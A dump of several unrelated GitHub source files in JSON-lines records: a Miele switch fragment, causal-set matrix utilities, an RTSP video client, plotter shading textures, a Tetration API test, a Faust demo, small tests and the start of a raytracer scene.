kwargs)\n try:\n await self._api.send_action(self._ent, self.entity_description.on_data)\n except aiohttp.ClientResponseError as ex:\n _LOGGER.error(\"Turn_on: %s - %s\", ex.status, ex.message)\n\n # await self.coordinator.async_request_refresh()\n\n async def async_turn_off(self, **kwargs):\n \"\"\"Turn off the device.\"\"\"\n _LOGGER.debug(\"turn_off -> kwargs: %s\", kwargs)\n try:\n await self._api.send_action(self._ent, self.entity_description.off_data)\n except aiohttp.ClientResponseError as ex:\n _LOGGER.error(\"Turn_off: %s - %s\", ex.status, ex.message)\n\n # await self.coordinator.async_request_refresh()\n","repo_name":"astrandb/miele","sub_path":"custom_components/miele/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":7528,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"2"} +{"seq_id":"39750100697","text":"__author__ = \"\\n\".join([\"James Clough (james.clough91@gmail.com)\"])\n\nimport numpy as np\n\ndef causet_adj_matrix(S, R):\n \"\"\" Return causal set adjacency matrix A\n \n S: separations\n R: original coordinates\"\"\"\n N = S.shape[0]\n A = np.zeros((N, N))\n for i in range(N):\n for j in range(N):\n # check time ordering - A[i,j] is 1 if i is in the future of j\n if R[i,0] > R[j,0]:\n if S[i,j] < 0:\n A[i,j] = 1.\n return A \n \ndef transitive_completion(A_):\n \"\"\" Transitively complete adjacency matrix A\"\"\"\n A = A_[:,:]\n A_0 = A[:,:]\n N, _ = A.shape\n A_diff = True\n i = 0\n while A_diff:\n A_old = A[:,:]\n A = np.dot(A, A_0)\n A += A_0\n A[A>1.] 
= 1.\n        if np.array_equal(A_old, A):\n            A_diff = False\n        assert i < N, 'ERROR - Transitive Completion required more than N steps'\n        i += 1\n    return A\n    \ndef transitive_reduction(A_, LP=None):\n    \"\"\" Transitively reduce adjacency matrix A\n    \n    plan is to look at successive powers of A and if an element is 1 in both\n    then it represents an edge which is transitively implied\n    we need to do this |LP| times - \n    - could do it N times to be sure (start here)\n    - could compute |LP| but that might be slower\n    - could allow |LP| as optional input in case it is already calculated\n    \"\"\"\n    A = A_[:,:]\n    A_0 = A[:,:]\n    N, _ = A.shape\n    if LP:\n        max_path = LP\n    else:\n        max_path = N\n    i = 0\n    while i < max_path:\n        A = np.dot(A, A_0)\n        A = A_0 - A\n        A[A<1] = 0\n        A[A>1] = 1\n        i += 1\n    return A\n\ndef longest_path_matrix(A, dmax=None):\n    \"\"\" Calculate all longest paths and return them in a matrix\n    \n    Arguments:\n    A -- adjacency matrix\n    dmax -- maximum path length to be returned\n    \n    Result should be an NxN asymmetric matrix of longest paths\n    \n    Notes:\n    JC - I believe this scales like N**3\n    Finding one longest path can be done in linear time\n    And we need to find N**2 of them so this is reasonable\n    \n    JC - The longest path is conjectured to approximate the geodesic in \n    Lorentzian spacetimes but this is not proven to my knowledge \n    \"\"\"\n    N = A.shape[0]\n    if dmax is None:\n        dmax = N\n    LP = np.zeros((N, N))\n    i = 1\n    B = A[:,:]\n    while np.sum(B) > 0.:\n        path_exist = np.sign(B)\n        path_length = i * path_exist\n        LP = np.maximum.reduce((LP, path_length))\n        B = np.dot(B, A)\n        i += 1\n        if i == dmax:\n            return LP\n    return LP\n    \ndef naive_spacelike_matrix(LP, dmax=None, k=None): \n    \"\"\" Calculate all naive spacelike distances and return them in a matrix\n    \n    Arguments:\n    LP -- longest path matrix\n    dmax -- maximum spacelike distance to be returned\n    k -- only determine distances to k 'landmark' points, and leave the rest\n    # this feature needs testing\n    \n    Result should be an NxN symmetric matrix of negative longest paths\n    and positive naive spacelike separations\n    \n    JC - this seems quite slow when calculated for all N - I think it is the \n    limiting factor on embedding large networks in spacetimes\n    \"\"\"\n    if dmax is None:\n        dmax = np.max(LP)\n    ds = LP + LP.transpose()\n    ds2 = ds * ds * -1\n    N = LP.shape[0]\n    for i in range(N):\n        max_j = i\n        if k:\n            max_j = np.min([i, k])\n        for j in range(max_j):\n            # spacelike distance is symmetric so ds[i,j]==ds[j,i], and ds[i,i]==0\n            if ds2[i,j] == 0:\n                # then they are spacelike separated and need a new value here\n                i_past = np.flatnonzero(LP[:,i])\n                j_past = np.flatnonzero(LP[:,j])\n                w_list = np.intersect1d(i_past, j_past)\n\n                i_future = np.flatnonzero(LP[i,:])\n                j_future = np.flatnonzero(LP[j,:])\n                z_list = np.intersect1d(i_future, j_future)\n                if (len(z_list)>0) and (len(w_list)>0):\n                    # find min non-zero LP from w to z\n                    sp_dist = dmax\n                    for w in w_list:\n                        for z in z_list:\n                            w_z = LP[w, z]\n                            if w_z > 0:\n                                sp_dist = min(sp_dist, w_z)\n                else:\n                    sp_dist = dmax\n                \n                ds2[i,j] = sp_dist * sp_dist\n                ds2[j,i] = sp_dist * sp_dist\n    return ds2 \n","repo_name":"JamesClough/dagology","sub_path":"dagology/matrix/matrix_utils.py","file_name":"matrix_utils.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} {"seq_id":"10447737017","text":"from tkinter import *\nimport tkinter.messagebox\nfrom PIL import Image, ImageTk\nimport socket, threading, os\nfrom Normal.RtpPacket import RtpPacket
\nimport glob\nfrom time import time\n\nCACHE_FILE_NAME = \"cache-\"\nCACHE_FILE_EXT = \".jpg\"\n\nclass Client:\n\tINIT = 0\n\tREADY = 1\n\tPLAYING = 2\n\tstate = INIT\n\t\n\tSETUP = 0\n\tPLAY = 1\n\tPAUSE = 2\n\tTEARDOWN = 3\n\t\n\tdef __init__(self, master, serveraddr, serverport, rtpport, filename):\n\t\tself.master = master\n\t\tself.master.protocol(\"WM_DELETE_WINDOW\", self.handler)\n\t\tself.createWidgets()\n\t\tself.serverAddr = serveraddr\n\t\tself.serverPort = int(serverport)\n\t\tself.rtpPort = int(rtpport)\n\t\tself.fileName = filename\n\t\tself.rtspSeq = 0\n\t\tself.sessionId = 0\n\t\tself.requestSent = -1\n\t\tself.teardownAcked = 0\n\t\tself.frameNbr = 0\n\t\tself.playEvent = threading.Event()\n\n\t# Initiation\n\t# THIS GUI IS JUST FOR REFERENCE ONLY, STUDENTS HAVE TO CREATE THEIR OWN GUI \t\n\tdef createWidgets(self):\n\t\t\"\"\"Build GUI.\"\"\"\n\t\t# Create Setup button\n\t\tself.setup = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.setup[\"text\"] = \"Setup\"\n\t\tself.setup[\"command\"] = self.setupMovie\n\t\tself.setup.grid(row=1, column=0, padx=2, pady=2)\n\t\t\n\t\t# Create Play button\t\t\n\t\tself.start = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.start[\"text\"] = \"Play\"\n\t\tself.start[\"command\"] = self.playMovie\n\t\tself.start.grid(row=1, column=1, padx=2, pady=2)\n\t\t\n\t\t# Create Pause button\t\t\t\n\t\tself.pause = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.pause[\"text\"] = \"Pause\"\n\t\tself.pause[\"command\"] = self.pauseMovie\n\t\tself.pause.grid(row=1, column=2, padx=2, pady=2)\n\t\t\n\t\t# Create Teardown button\n\t\tself.teardown = Button(self.master, width=20, padx=3, pady=3)\n\t\tself.teardown[\"text\"] = \"Teardown\"\n\t\tself.teardown[\"command\"] = self.exitClient\n\t\tself.teardown.grid(row=1, column=3, padx=2, pady=2)\n\t\t\n\t\t# Create a label to display the movie\n\t\tself.label = Label(self.master, height=19)\n\t\tself.label.grid(row=0, column=0, columnspan=4, sticky=W+E+N+S, padx=5, pady=5) \n\t\n\tdef setupMovie(self):\n\t\t\"\"\"Setup button handler.\"\"\"\n\t\tif self.state == Client.INIT:\n\t\t\t# Reset session state\n\t\t\tself.rtspSeq = 0\n\t\t\tself.frameNbr = 0\n\t\t\tself.teardownAcked = 0\n\t\t\t# Setup RTSP\n\t\t\tself.connectToServer()\n\t\t\tthreading.Thread(target=self.recvRtspReply).start()\n\t\t\t# Send request\n\t\t\tself.sendRtspRequest(Client.SETUP)\n\t\n\tdef exitClient(self):\n\t\t\"\"\"Teardown button handler.\"\"\"\n\t\t# Pause movie if it is playing\n\t\tif self.state == Client.PLAYING:\n\t\t\tself.pauseMovie()\n\t\t\twhile self.state == Client.PLAYING:\n\t\t\t\tcontinue\n\t\t\n\t\tif self.state == Client.READY:\n\t\t\t# Send request\n\t\t\tself.sendRtspRequest(Client.TEARDOWN)\n\t\t\tif os.path.exists(CACHE_FILE_NAME + str(self.sessionId) + CACHE_FILE_EXT):\n\t\t\t\tos.remove(CACHE_FILE_NAME + str(self.sessionId) + CACHE_FILE_EXT)\n\n\tdef pauseMovie(self):\n\t\t\"\"\"Pause button handler.\"\"\"\n\t\tif self.state == Client.PLAYING:\n\t\t\tself.playEvent.set()\n\t\t\tself.sendRtspRequest(Client.PAUSE)\n\t\n\tdef playMovie(self):\n\t\t\"\"\"Play button handler.\"\"\"\n\t\tif self.state == Client.READY:\n\t\t\tself.playEvent.clear()\n\t\t\tthreading.Thread(target=self.listenRtp).start()\n\t\t\tself.sendRtspRequest(Client.PLAY)\n\t\t\t\n\tdef listenRtp(self):\t\t\n\t\t\"\"\"Listen for RTP packets.\"\"\"\n\t\tpacketLoss = 0\n\t\tpacketSlow = 0\n\t\tvideoData = 0\n\t\tstart = time()\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdata = self.rtpSocket.recv(20480)\n\t\t\t\tif 
data:\n\t\t\t\t\trtpPacket = RtpPacket()\n\t\t\t\t\trtpPacket.decode(data)\n\t\t\t\t\tcurrFrameNbr = rtpPacket.seqNum()\n\t\t\t\t\t# Count loss packet\n\t\t\t\t\tif currFrameNbr > self.frameNbr + 1:\n\t\t\t\t\t\tpacketLoss += currFrameNbr - (self.frameNbr + 1) \n\t\t\t\t\t# Count slow packet\n\t\t\t\t\tif currFrameNbr < self.frameNbr:\n\t\t\t\t\t\tpacketSlow += 1\n\t\t\t\t\t# Update frame\n\t\t\t\t\tif currFrameNbr > self.frameNbr: \n\t\t\t\t\t\tself.frameNbr = currFrameNbr\n\t\t\t\t\t\tpayload = rtpPacket.getPayload()\n\t\t\t\t\t\tself.updateMovie(self.writeFrame(payload))\n\t\t\t\t\t\t# Count video data\n\t\t\t\t\t\tvideoData += len(payload)\n\t\t\t\t\t\tif self.frameNbr == 500:\n\t\t\t\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\t# Stop listening if request is PAUSE or TEARDOWN\n\t\t\t\tif self.playEvent.isSet():\n\t\t\t\t\tbreak\n\t\t\t\tif self.teardownAcked:\n\t\t\t\t\tself.rtpSocket.shutdown(socket.SHUT_RDWR)\n\t\t\t\t\tself.rtpSocket.close()\n\t\t\t\t\tbreak\n\t\tend = time()\n\t\t# Calc and print data transmission parameters\n\t\tprint(\"\\n===============================\")\n\t\tprint(f\"RTP Packet Loss Rate = {packetLoss-packetSlow}/{self.frameNbr} = {100 * (packetLoss-packetSlow)/self.frameNbr} %\")\n\t\tprint(f\"RTP Packet Slow Rate = {packetSlow}/{self.frameNbr} = {100 * packetSlow /self.frameNbr} %\")\n\t\tprint(f\"Video data rate = {videoData}/{end - start} = {videoData/(end - start)} bytes/sec\")\n\t\tprint(\"===============================\\n\")\n\t\t\t\t\t\t\t\t\n\tdef writeFrame(self, data):\n\t\t\"\"\"Write the received frame to a temp image file. Return the image file.\"\"\"\n\t\tcachename = CACHE_FILE_NAME + str(self.sessionId) + CACHE_FILE_EXT\n\t\tfile = open(cachename, \"wb\")\n\t\tfile.write(data)\n\t\tfile.close()\n\t\treturn cachename\n\t\n\tdef updateMovie(self, imageFile):\n\t\t\"\"\"Update the image file as video frame in the GUI.\"\"\"\n\t\tphoto = ImageTk.PhotoImage(Image.open(imageFile)) \n\t\tself.label.configure(image = photo, height=288)\n\t\tself.label.image = photo\n\t\t\n\tdef connectToServer(self):\n\t\t\"\"\"Connect to the Server. 
Start a new RTSP/TCP session.\"\"\"\n\t\tself.rtspSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\ttry:\n\t\t\tself.rtspSocket.connect((self.serverAddr, self.serverPort))\n\t\texcept:\n\t\t\ttkinter.messagebox.showwarning(f\"Connect to {self.serverAddr} at port {self.serverPort} failed!\")\n\t\n\tdef sendRtspRequest(self, requestCode):\n\t\t\"\"\"Send RTSP request to the server.\"\"\"\t\n\t\trequest = \"\"\n\t\tself.rtspSeq += 1\n\t\tif requestCode == Client.SETUP:\n\t\t\trequest += f\"SETUP {self.fileName} RTSP/1.0\\n\"\n\t\t\trequest += f\"CSeq: {self.rtspSeq}\\n\"\n\t\t\trequest += f\"Transport: RTP/UDP; client_port= {self.rtpPort}\\n\"\n\t\telse:\n\t\t\tif requestCode == Client.PLAY:\n\t\t\t\trequest += \"PLAY\"\n\t\t\tif requestCode == Client.PAUSE:\n\t\t\t\trequest += \"PAUSE\"\n\t\t\tif requestCode == Client.TEARDOWN:\n\t\t\t\trequest += \"TEARDOWN\"\n\t\t\trequest += f\" {self.fileName} RTSP/1.0\\n\"\n\t\t\trequest += f\"CSeq: {self.rtspSeq}\\n\"\n\t\t\trequest += f\"Session: {self.sessionId}\\n\"\n\t\tself.requestSent = requestCode\n\t\tself.rtspSocket.send(request.encode())\n\t\n\tdef recvRtspReply(self):\n\t\t\"\"\"Receive RTSP reply from the server.\"\"\"\n\t\twhile True:\n\t\t\t# Stop listening if teardown\n\t\t\tif self.teardownAcked:\n\t\t\t\tself.rtspSocket.shutdown(socket.SHUT_RDWR)\n\t\t\t\tself.rtspSocket.close()\n\t\t\t\tbreak\n\t\t\t# Recv reply and process\n\t\t\tdata = self.rtspSocket.recv(256)\n\t\t\tif data: \n\t\t\t\tself.parseRtspReply(data.decode())\n\t\t\t\t\n\tdef parseRtspReply(self, data: str):\n\t\t\"\"\"Parse the RTSP reply from the server.\"\"\"\n\t\tresponse = data.split('\\n')\n\t\tcode = int(response[0].split(' ')[1])\n\t\t# Check status code\n\t\tif code == 200:\n\t\t\tseq = int(response[1].split(' ')[1])\n\t\t\t# Check sequence number\n\t\t\tif seq == self.rtspSeq:\n\t\t\t\tsession = int(response[2].split(' ')[1])\n\t\t\t\t# If requestSent is SETUP, update session ID\n\t\t\t\tif self.requestSent == Client.SETUP:\n\t\t\t\t\tself.sessionId = session\n\t\t\t\t\tself.state = Client.READY\n\t\t\t\t\tself.openRtpPort()\n\t\t\t\telse:\n\t\t\t\t\t# Else check session ID and process the reply\n\t\t\t\t\tif self.sessionId != session: return\n\t\t\t\t\tif self.requestSent == Client.PLAY:\n\t\t\t\t\t\tself.state = Client.PLAYING\n\t\t\t\t\telif self.requestSent == Client.PAUSE:\n\t\t\t\t\t\tself.state = Client.READY\n\t\t\t\t\telif self.requestSent == Client.TEARDOWN:\n\t\t\t\t\t\tself.state = Client.INIT\n\t\t\t\t\t\tself.teardownAcked = 1\n\t\telif code == 404:\n\t\t\ttkinter.messagebox.showwarning('File not found!')\n\t\telif code == 500: \n\t\t\ttkinter.messagebox.showwarning('Connection error!')\n\t\t\n\tdef openRtpPort(self):\n\t\t\"\"\"Open RTP socket bound to a specified port.\"\"\"\n\t\t# Create a new datagram socket to receive RTP packets from the server\n\t\tself.rtpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t# Set the timeout value of the socket to 0.5sec\n\t\tself.rtpSocket.settimeout(0.5)\n\t\ttry:\n\t\t\tself.rtpSocket.bind(('', self.rtpPort))\n\t\texcept:\n\t\t\ttkinter.messagebox.showwarning(f\"Bind to port {self.rtpPort} failed!\")
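\n\n\t# For reference, a success reply that parseRtspReply() accepts looks\n\t# roughly like this (illustrative, not a captured trace):\n\t#   RTSP/1.0 200 OK\n\t#   CSeq: 2\n\t#   Session: 123456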
Teardown session\n\t\t\tself.exitClient()\n\t\t\t# Close app\n\t\t\tself.master.destroy()\n\t\telse: \n\t\t\t# When the user presses cancel, resume playing.\n\t\t\tself.playMovie()","repo_name":"hoale0231/RTSP-RTP-Media_Stream","sub_path":"Normal/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":8410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26023447735","text":"import numpy as np\nfrom scipy.ndimage import imread\nfrom math import pi, sqrt, sin, cos\nimport subprocess\nimport pickle\n\nimport svgwrite as svg\n\nfrom random import random\n\nfrom shapely import geometry as geom\nfrom shapely import affinity\n\nfrom itertools import product\n\ndef in_image(x,y, w,h):\n return x + w/2 < w and \\\n x + w/2 >= 0 and \\\n y + h/2 < h and \\\n y + h/2 >= 0\n\n\ndef spiral(points, step_along_spiral, step_out_per_rot, max_r):\n dr = step_out_per_rot / (2*pi)\n r = step_along_spiral\n a = r / dr\n x,y = 0,0\n npoints = 0\n while r < max_r:\n if points.shape[0] <= npoints:\n points.resize((npoints + 100000, points.shape[1]), refcheck=False)\n #print('Resize to %s points for radius %s/%s'%(points.shape[0], r, max_r))\n\n a += step_along_spiral / r\n r = dr * a\n\n x = r * np.cos(a)\n y = r * np.sin(a)\n\n points[npoints,0] = x\n points[npoints,1] = y\n\n npoints += 1\n\n #print('%s points'%npoints)\n points.resize((npoints, points.shape[1]), refcheck=False)\n\ndef spiral_shade(step, w,h):\n points = np.empty([0,2], dtype='float64')\n spiral(points, 2, step + 0.5, sqrt(2*(max(w,h)/2)**2))\n #print(step, points.shape)\n points[:,:] += [w/2, h/2]\n if points.shape[0] < 2:\n return geom.MultiLineString([])\n lines = geom.asLineString(points)#.intersection(geom.box(0,0,w,h))\n if isinstance(lines, geom.LineString):\n return geom.MultiLineString([lines])\n else:\n return lines\n\ndef many_spirals(step, w,h):\n \"\"\"Step range should be 0-1 but internally it's 1-0 because more spiral = darker\"\"\"\n spacing = 100\n points = np.empty([0,2], dtype='float64')\n spiral(points, 0.5, 2, (1-step) * spacing)\n if points.shape[0] < 2: return geom.MultiLineString([])\n little_spiral = geom.asLineString(points)\n lines = []\n print((w/spacing) * (h/spacing), 'spirals')\n for x,y in product(range(int(w/spacing)), range(int(h/spacing))):\n lines.append(affinity.translate(little_spiral, x*spacing, y*spacing))\n return geom.MultiLineString(lines)\n\ndef random_line(length, w,h):\n x = random()*w\n y = random()*h\n p1 = (x,y)\n a = random() * 2*pi\n p2 = (x + length*cos(a), y + length*sin(a))\n return geom.LineString([p1, p2])\n\ndef random_line(length, w,h):\n return geom.LineString([(random()*w, random()*h), (random()*w, random()*h)])\n\ndef random_lines(grey, w,h):\n black_lines_per_area = 0.02\n increase_area = 1.1\n woff, hoff = w*(1-increase_area) / 2, h*(1-increase_area) / 2\n w *= increase_area\n h *= increase_area\n\n nlines = 1 + int(black_lines_per_area * w*h * (1 - grey / 256.))\n length = sqrt(w**2 + h**2)\n return geom.MultiLineString([affinity.translate(random_line(length, w, h), woff, hoff)\n for _ in range(nlines)])\n\ndef diagonal_lines(step, w,h):\n if step == 0: return geom.MultiLineString([])\n x = max(w,h)\n nlines = int(2 * x / step)\n\n lines = []\n for i in range(nlines):\n if i*step <= x:\n lines.append(geom.LineString([(i*step,0), (0,i*step)]))\n else:\n lines.append(geom.LineString([(i*step-x,x), (x,i*step-x)]))\n return geom.MultiLineString(lines)\n\n\ndef hatch_shade(step, w,h):\n if step == 0: return 
geom.MultiLineString([])\n x = max(w,h)\n nlines = 2 * x / step # you have to go twice as far to fill the whole square with hash\n\n lines = []\n xh = x / 2.\n for i in range(int(nlines)):\n if i*step <= x:\n line = geom.LineString([(i*step,0), (0,i*step)])\n else:\n line = geom.LineString([(i*step-x,x), (x,i*step-x)])\n lines.append(line)\n\n x1,y1,x2,y2 = *line.coords[0], *line.coords[1]\n x1 = (xh*2-x1)\n x2 = (xh*2-x2)\n line = geom.LineString([(x1,y1), (x2,y2)])\n\n lines.append(line)\n\n return geom.MultiLineString(lines)\n\ndef generate_textures(greys, w,h):\n return {g: many_spirals(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, many_spirals))}\n return {g: spiral_shade(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, spiral_shade))}\n return {g: hatch_shade(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, hatch_shade))}\n return {g: diagonal_lines(v, w,h) for g,v in zip(greys, find_inputs_for_greys(greys, diagonal_lines))}\n\ndef shade_test():\n dwg = svg.Drawing('grey_test.svg')\n nsteps = 10\n x = 500\n for i in range(nsteps):\n grey = (i+1) * 256 / nsteps\n box = geom.box(0, i * x/nsteps, x/nsteps, (i+1) * x/nsteps)\n #lines = affinity.translate(diagonal_lines(grey, x/nsteps, x/nsteps), x/nsteps, i*x/nsteps)\n lines = affinity.translate(hatching(grey, x/nsteps, x/nsteps), x/nsteps, i*x/nsteps)\n\n svgbox = svg.shapes.Polygon(box.exterior.coords)\n svgbox.fill('rgb(%i,%i,%i)'%(grey,grey,grey))\n dwg.add(svgbox)\n for line in lines:\n svgline = svg.shapes.Line(line.coords[0], line.coords[1])\n svgline.fill('none')\n svgline.stroke('black', width=1.00)\n dwg.add(svgline)\n\n dwg.viewbox(minx=0, miny=0, width=2*x/nsteps, height=x)\n dwg.save()\n\n\ngrey_shade_cache = {}\ngrey_shade_cache_filename = 'grey_cache.pickle'\ndef init_texture_data_cache():\n global grey_shade_cache\n try:\n with open(grey_shade_cache_filename, 'rb') as f:\n grey_shade_cache = pickle.load(f)\n except FileNotFoundError:\n pass\n\ndef save_texture_data_cache():\n global grey_shade_cache\n with open(grey_shade_cache_filename, 'wb') as f:\n pickle.dump(grey_shade_cache, f, pickle.HIGHEST_PROTOCOL)\n\ndef test_shade_grey(shade_fn, inpt):\n global grey_shade_cache\n\n if inpt in grey_shade_cache:\n return grey_shade_cache[inpt]\n\n lines = shade_fn(inpt, 100,100)\n\n filename = 'temp_grey_test.svg'\n dwg = svg.Drawing(filename)\n for line in lines:\n svgline = svg.shapes.Polyline(line.coords)\n svgline.fill('none')\n svgline.stroke('black', width=1.00)\n dwg.add(svgline)\n\n dwg.viewbox(minx=0, miny=0, width=100, height=100)\n dwg.save()\n\n render_svg(filename)\n image = imread(filename + '.png')\n grey = np.sum(image) / np.product(image.shape)\n\n grey_shade_cache[inpt] = grey\n return grey\n\n\ndef within(x, tolerance, y):\n return x - tolerance < y and x + tolerance > y\n\ndef calibrate_grey(target_grey, shade_fn, tolerance=5):\n lo,hi = 0, 1#000\n mid = lo + (hi - lo) / 2\n\n hi_grey = test_shade_grey(shade_fn, hi)\n mid_grey = test_shade_grey(shade_fn, mid)\n lo_grey = test_shade_grey(shade_fn, lo)\n\n print('----', target_grey, '----')\n while not within(target_grey, tolerance, mid_grey):\n if mid_grey > target_grey:\n hi = mid\n else:\n lo = mid\n\n mid = lo + (hi - lo) / 2\n hi_grey = test_shade_grey(shade_fn, hi)\n mid_grey = test_shade_grey(shade_fn, mid)\n lo_grey = test_shade_grey(shade_fn, lo)\n print(mid, mid_grey)\n\n print(target_grey, mid)\n save_texture_data_cache()\n return mid\n\ndef render_svg(filename, width=200):\n subprocess.run(['/usr/bin/inkscape', '-z', 
'-f', filename, '-w', str(width), '-b', 'white', '-e', filename + '.png'], stdout=subprocess.DEVNULL)\n subprocess.run(['/usr/bin/convert', '-type', 'Grayscale', filename + '.png', filename + '.png'], stdout=subprocess.DEVNULL)\n\ndef find_inputs_for_greys(greys, shade_fn, tolerance=2):\n calculate_normalization_scale(shade_fn)\n print(list(zip(greys, [texture_data[shade_fn][\"normalization_scale\"](grey) for grey in greys])))\n return [calibrate_grey(texture_data[shade_fn][\"normalization_scale\"](grey), shade_fn, tolerance) for grey in greys] \n\ndef calculate_normalization_scale(shade_fn):\n gmin = test_shade_grey(shade_fn, texture_data[shade_fn][\"calibration_range\"][0])\n gmax = test_shade_grey(shade_fn, texture_data[shade_fn][\"calibration_range\"][1])\n gmin, gmax = min(gmax,gmin), max(gmax,gmin)\n print(shade_fn.__name__, gmax, gmin)\n texture_data[shade_fn][\"normalization_scale\"] = lambda x: gmin + (x / 255.) * (gmax - gmin)\n\ndef scales():\n pass\n\ndef id(x): return x\n\ntexture_data = {\n diagonal_lines : {\"calibration_range\": (0,100), \"normalization_scale\": id },\n hatch_shade : {\"calibration_range\": (0,100), \"normalization_scale\": id},\n spiral_shade : {\"calibration_range\": (0,100), \"normalization_scale\": id},\n many_spirals : {\"calibration_range\": (0,1), \"normalization_scale\": id},\n scales : {\"calibration_range\": (0,100), \"normalization_scale\": id},\n}\n","repo_name":"charlieb/shading","sub_path":"shade_textures.py","file_name":"shade_textures.py","file_ext":"py","file_size_in_byte":8618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73070683247","text":"import json\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nfrom tetpyclient import RestClient\n\nimport environment as env\n\n# Disable insecure request warnings\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n# FUNCTIONS\n\n# Test Connectivity to Tetration API\n\n\ndef tetration_test(\n host=env.TET.get(\"host\"),\n api_key=env.TET_API_KEY,\n api_sec=env.TET_SEC\n):\n\n # Build URL\n url = f\"https://{host}\"\n\n restclient = RestClient(url,\n api_key=api_key,\n api_secret=api_sec,\n verify=True)\n\n # HTTP Get Request\n response = restclient.get(\"/applications\")\n\n # If response code is 200, Test Successful\n if response.status_code == 200:\n print(\"Test Successful....Woo Hoo!\")\n\n # return applications\n\n # If response code is anything but 200, print error message with response code\n else:\n print(f\"Test Failed....DOE!\"\n f\"\\nError Code {response.status_code}\")\n\n\n# If this script is the \"main\" script, run...\n\nif __name__ == \"__main__\":\n\n # Run Test\n results = tetration_test()\n\n","repo_name":"CiscoDevNet/CiscoSecurityAPIsStartNow","sub_path":"Tetration/tetration_test.py","file_name":"tetration_test.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"2"} +{"seq_id":"12101847608","text":"import haydi as hd\n\n\ndef test_iterator_first():\n assert 0 == hd.Range(10).first(-1).run()\n assert -1 == hd.Range(0).first(-1).run()\n\n\ndef test_iterator_reduce():\n expected = sum(range(10))\n result = hd.Range(10).reduce(lambda x, y: x + y).run()\n assert expected == result\n\n expected = max(range(10))\n result = hd.Range(10).reduce(max).run()\n assert expected == 
result\n","repo_name":"spirali/haydi","sub_path":"tests/test_iterator.py","file_name":"test_iterator.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"33183668216","text":"from typing import List, Optional, AsyncIterable\nimport random\nimport uuid\n\nimport faust\nfrom kafka import KafkaProducer\n\napp = faust.App(\"demo\")\nproducer = KafkaProducer()\n\nclass CustomerRecord(faust.Record, serializer=\"json\"):\n msg_id: uuid.UUID\n customer: str\n amount: int\n number_of_purchases: int\n note: Optional[str]\n\ncustomer_topic = app.topic(\"customer_topic\", value_type=CustomerRecord)\n\ncompleted_customer_topic = app.topic(\"completed_customer_topic\", value_type=CustomerRecord)\n\ndef ring_up_customer(customer):\n customer.number_of_purchases += 1\n purchase_price = random.randint(1, 100)\n customer.amount += purchase_price\n print(f\"{customer.customer} spent {purchase_price}\")\n\ndef customer_is_done(customer):\n return (customer.number_of_purchases > 100\n or customer.amount > 5000\n or random.randint(1, 100) == 1)\n\n@app.agent(customer_topic, concurrency=20)\nasync def purchase_processor(customers: AsyncIterable[CustomerRecord]):\n \"\"\"Process customer purchases.\"\"\"\n async for customer in customers:\n ring_up_customer(customer)\n if customer_is_done(customer):\n print(f\"{customer.customer} spent {customer.amount / customer.number_of_purchases} on average.\")\n print(customer)\n producer.send(\"completed_customer_topic\", customer.dumps())\n else:\n producer.send(\"customer_topic\", customer.dumps())\n","repo_name":"BWStearns/faust_intro","sub_path":"app/recursive_demo.py","file_name":"recursive_demo.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"26556662137","text":"from gl import *\r\nfrom texture import Texture\r\nfrom obj import ObjReader\r\nfrom envmap import Envmap\r\nfrom sphere import *\r\n\r\nif __name__ == '__main__':\r\n brick = Material(diffuse = color(0.8, 0.25, 0.25 ), spec = 16)\r\n stone = Material(diffuse = color(0.4, 0.4, 0.4 ), spec = 32)\r\n mirror = Material(spec = 64, matType = REFLECTIVE)\r\n glass = Material(spec = 64, ior = 1.5, matType= TRANSPARENT) \r\n\r\n EscritorioMAt = Material(texture = Texture('./Utils/madera22.bmp'))\r\n Mantel = Material(texture = Texture('./Utils/mantel.bmp'))\r\n GoldLampMaterial = Material(texture = Texture('./Utils/lamp.bmp'))\r\n\r\n DiscoBall = Material(texture = Texture('./Utils/discob.bmp'))\r\n\r\n speakers = Material(texture = Texture('./Utils/bass2.bmp'))\r\n MaterialPared = Material(texture = Texture('./Utils/pared.bmp'))\r\n\r\n\r\n width = 1920\r\n height = 1080\r\n r = Raytracer(width,height)\r\n r.glClearColor(0.2, 0.6, 0.8)\r\n r.glClear()\r\n\r\n r.envmap = Envmap('./Utils/dark.bmp')\r\n\r\n\r\n # Lights\r\n r.pointLights.append( PointLight(position = V3(-3, -1.225, -10), intensity = 0.25)) # util\r\n r.pointLights.append( PointLight(position = V3(-3, -1.225, -11), intensity = 0.07)) # Window Efect\r\n r.ambientLight = AmbientLight(strength = 0.35)\r\n\r\n # Desk\r\n r.scene.append( AABB(V3(0, -3, -10), V3(10, 0.1, 5) , EscritorioMAt, 'box' ) )\r\n r.scene.append( AABB(V3(0, -2.9, -10), V3(9, 0.08, 4) , Mantel, 'box' ) )\r\n r.scene.append( AABB(V3(-5, -5.45, -10), V3(0.1, 5, 5) , EscritorioMAt, 'box' ) )\r\n r.scene.append( AABB(V3(5, -5.45, -10), V3(0.1, 5, 5) , 